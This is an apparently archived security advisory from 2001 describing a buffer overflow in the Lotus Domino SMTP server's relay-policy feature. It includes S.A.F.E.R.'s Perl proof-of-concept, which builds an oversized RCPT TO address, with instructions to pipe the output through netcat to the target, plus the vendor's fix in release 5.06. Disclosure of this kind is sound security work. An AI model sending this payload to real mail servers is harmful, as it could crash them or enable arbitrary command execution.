|
Reported January 23, 2001, by S.A.F.E.R.
Lotus Domino SMTP Server contains a policy feature that you can use to prevent email relaying. However, a malicious attacker can use a vulnerability in this policy feature to overflow the buffer and possibly launch arbitrary commands. DEMONSTRATION S.A.F.E.R. supplied the following proof-of-concept code: -- cut -- #!/usr/bin/perl $req="a" . "%A"x200 . "A"x600 . "%allowed.domain.com\@allowed.domain.com"; print "ehlo foo\nmail from: blah\@example.com\nrcpt to:$req\ndata\nfoo\n.\nquit\n"; -- cut -- Simply replace “allowed.domain.com” with the domain name running Lotus Notes SMTP Server, and pipe the output through netcat. VENDOR RESPONSE Lotus was informed of this vulnerability on November 2, 2000, and has fixed this issue in release 5.06. CREDIT |
0 comments
Hide comments